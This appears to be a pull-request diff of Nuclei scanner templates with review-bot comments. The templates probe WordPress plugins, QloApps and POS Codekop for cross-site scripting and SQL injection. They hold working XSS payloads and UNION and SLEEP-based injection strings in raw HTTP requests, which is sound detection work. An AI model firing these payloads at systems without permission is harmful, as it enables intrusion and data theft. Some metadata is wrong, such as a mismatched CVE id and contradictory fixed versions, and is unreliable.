- https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e
- https://wordpress.org/plugins/tiempocom/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2272
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2272
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
- 'contains(body_2, "Tiempo")'
condition: and


@ -17,7 +17,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
verified: true verified: true
tags: cve,cve2023,churchcrm,stored,xss,authenticated tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
http: http:
- raw: - raw:


@ -17,7 +17,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
verified: true verified: true
tags: cve,cve2023,churchcrm,stored,xss,authenticated tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
http: http:
- raw: - raw:


@ -0,0 +1,44 @@
id: CVE-2023-30256
info:
name: Webkul QloApps 1.5.2 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.
reference:
- https://github.com/webkul/hotelcommerce
- http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html
- https://github.com/ahrixia/CVE-2023-30256
- https://nvd.nist.gov/vuln/detail/CVE-2023-30256
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30256
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,webkul-qloapps,unauth
http:
- method: GET
path:
- "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "xss onfocus=alert(document.domain) autofocus= xss"
- "hasConfirmation"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
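Review bot: The request hard-codes `token=6c62b773f1b284ac4743871b300a0c4d` and `rand=1679996611398`, both values copied from one particular session rather than properties of the product; the sibling CVE-2023-36289 template sends `token={{randstr}}`, and the same should be done here (with `rand` dropped or set to `{{randstr}}`) so the template does not depend on a stale value and its requests are distinguishable in server logs. If the endpoint actually validates `token`, a comment saying where the value comes from is needed instead. The description also spells the vendor "Webkil" where the name says Webkul.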


@ -0,0 +1,44 @@
id: CVE-2023-30777
info:
name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f
- https://wordpress.org/plugins/advanced-custom-fields/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-30777
remediation: Fixed in version 6.1.6.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30777
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "onanimationstart=alert(document.domain)//")'
- 'contains(body_2, "Advanced Custom Fields")'
condition: and
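Review bot: The description has the typo "beofre" (`Advanced Custom Fields beofre 6.1.6`); it should read "before". The tag `advance-custom-field` does not match the plugin slug `advanced-custom-fields` used in the reference URL, which makes the template hard to select with `-tags`; rename it to the slug.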


@ -17,7 +17,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
verified: true verified: true
tags: cve,cve2023,churchcrm,stored,xss,authenticated tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
http: http:
- raw: - raw:


@ -0,0 +1,47 @@
id: CVE-2023-36287
info:
name: Webkul QloApps 1.6.0 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
reference:
- https://github.com/webkul/hotelcommerce
- https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900
- https://nvd.nist.gov/vuln/detail/CVE-2023-36287
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36287
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,webkul-qloapps,unauth
http:
- raw:
- |
POST / HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
controller=change-currency9405'-alert(document.domain)-'&id_currency=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'change-currency9405'-alert(document.domain)-'';"
- "customizationIdMessage"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
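Review bot: The request line reads `POST / HTTP/2` while every other raw request in this PR uses `HTTP/1.1`; unless the reflection depends on HTTP/2, the version should be `HTTP/1.1` so the request goes through the same raw-request path as the rest of the templates, and if HTTP/2 is genuinely required a comment above the raw block should say so. The `cvss-metrics` vector is also `CVSS:3.0` where the WordPress templates use `CVSS:3.1`; that is presumably what NVD publishes, but worth confirming.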


@ -0,0 +1,50 @@
id: CVE-2023-36289
info:
name: Webkul QloApps 1.6.0 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.
reference:
- https://github.com/webkul/hotelcommerce
- https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7
- https://nvd.nist.gov/vuln/detail/CVE-2023-36289
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36289
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,webkul-qloapps,unauth
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'onmouseover=alert(document.domain)'
- 'hasConfirmation'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
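Review bot: The `email` variable expands to `{{randstr}}@{{rand_base(5)}}.com`, a random but potentially real domain; if the target's account-creation path sends a confirmation or notification email, it goes to whoever owns that domain. Use a reserved documentation domain instead, `email: "{{randstr}}@example.com"`, which keeps the randomness in the local part and cannot deliver anywhere.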


@ -0,0 +1,42 @@
id: CVE-2023-36346
info:
name: POS Codekop v2.0 - Cross-site Scripting
author: r3Y3r53
severity: medium
description: |
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
reference:
- https://yuyudhn.github.io/pos-codekop-vulnerability/
- https://www.youtube.com/watch?v=bbbA-q1syrA
- https://nvd.nist.gov/vuln/detail/CVE-2023-36346
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30256
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,pos,codekop,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.location)</script>"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
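Review bot: `cve-id: CVE-2023-30256` does not match the template's `id: CVE-2023-36346` or its NVD reference; it was evidently copied from the QloApps template and should be `cve-id: CVE-2023-36346`. The template also uses the `requests:` key where every other template in the PR uses `http:`; `requests` is the older protocol key and should be changed to `http:` for consistency.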


@ -0,0 +1,35 @@
id: qdpm-login-panel
info:
name: qdPM Login Panel
author: theamanrawat
severity: info
metadata:
verified: "true"
shodan-query: http.favicon.hash:762074255
tags: panel,qdpm,login
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/index.php/login'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'qdPM'
- '/index.php/login/restorePassword'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200


@ -16,7 +16,7 @@ info:
max-request: 2 max-request: 2
verified: true verified: true
shodan-query: http.html:"yeswiki" shodan-query: http.html:"yeswiki"
tags: yeswiki,xss,stored,huntr tags: yeswiki,xss,stored-xss,huntr
http: http:
- raw: - raw:


@ -0,0 +1,44 @@
id: contus-video-gallery-sqli
info:
name: WordPress Video Gallery <= 2.8 - SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
reference:
- https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243
- https://wordpress.org/plugins/photo-gallery/
remediation: Fixed in version 1.6.3
metadata:
verified: true
tags: sqli,wpscan,wordpress,contus-video-gallery,unauth
variables:
num: '999999999'
http:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- -
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
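Review bot: The metadata contradicts itself: the name says `<= 2.8` is affected while `remediation: Fixed in version 1.6.3` names a lower version, and the second reference points to `https://wordpress.org/plugins/photo-gallery/`, a different plugin from the `contus-video-gallery` the template targets. Check the wpscan entry and correct both the remediation line and the plugin link.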


@ -0,0 +1,30 @@
id: leaguemanager-sql-injection
info:
name: LeagueManager <= 3.9.11 - SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
reference:
- https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3
- https://wordpress.org/plugins/leaguemanager/
metadata:
verified: true
tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth
http:
- raw:
- |
@timeout: 10s
GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "LeagueManagerAjaxL10n")'
condition: and
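Review bot: The `GET /?season=...` request line carries a duplicated query string — `league_id=1season=1&league_id=1'...` runs two parameter sets together with no separator, and the trailing `match_day=1&team_id=1` pair is repeated — which reads like a copy-paste slip rather than a deliberate probe. Collapse it to one `season`, `league_id`, `match_day` and `team_id` set so the request is legible and the `league_id` value is the only unusual element. The `info` block also lacks the `remediation:` field that the sibling templates carry (`remediation: Fixed in version <fixed-version-from-advisory>`), which is the first thing a defender triaging a hit needs. A single 6 s time-based check is also sensitive to slow targets, so a short comment above `matchers:` noting that `duration>=6` is the primary signal and the other clauses only reduce false positives would help the next maintainer.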
@ -0,0 +1,43 @@
id: notificationx-sqli
info:
name: NotificationX < 2.3.12 - SQL Injection
author: theamanrawat
severity: high
description: |
The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
reference:
- https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
- https://wordpress.org/plugins/notificationx/
remediation: Fixed in version 2.3.12
metadata:
verified: true
tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection
http:
- raw:
- |
GET /wp-json/ HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 401'
- 'contains(content_type, "application/json")'
- 'contains(body, "There is no notification created with this id")'
condition: and
extractors:
- type: regex
name: apikey
group: 1
regex:
- '"home":"(.*?)",'
internal: true
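Review bot: The tag `notificationx-sql-injection` in `tags:` does not follow the plugin-slug convention the sibling templates use (`leaguemanager`, `zero-spam`), and `unauth` is missing even though the description says the endpoint is reachable without authentication; `tags: sqli,wp,wp-plugin,wordpress,notificationx,unauth` would match the rest of the set. The `"home":"(.*?)",` extractor runs against both responses while only the `/wp-json/` index body is expected to contain `home`; that appears harmless because `apikey` is needed by the second request, but a comment above `extractors:` stating that the value is derived from the first response would make the two-request dependency explicit. `severity: high` also comes with no `classification:` block, so the rating is unjustified next to the `critical` siblings — the CVSS vector from the referenced WPScan advisory would anchor it.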
@ -0,0 +1,32 @@
id: zero-spam-sql-injection
info:
name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability.
reference:
- https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5
- https://wordpress.org/plugins/zero-spam/
remediation: Fixed in version 2.2.0
metadata:
verified: true
tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth
http:
- raw:
- |
@timeout: 10s
GET / HTTP/1.1
Host: {{Hostname}}
Client-IP: '+(select(0)from(select(sleep(7)))v)+'
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "zerospam-js")'
condition: and
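Review bot: The timing margin is tight: the `Client-IP` header induces a 7 s delay while the request is capped by `@timeout: 10s`, so any target that already needs a few seconds to render `/` will hit the timeout and return no body, and the `contains(body, "zerospam-js")` clause then turns a true positive into a false negative. Widen the timeout (or lower the delay relative to it) and record the chosen margin in a comment above `@timeout:`. The `description:` also repeats "WordPress" twice and never names the injection point, which is the one fact a defender needs to triage a hit; something like `The plugin does not sanitise the Client-IP header before using it in a SQL statement, allowing unauthenticated blind SQL injection.` would be more useful than the current wording.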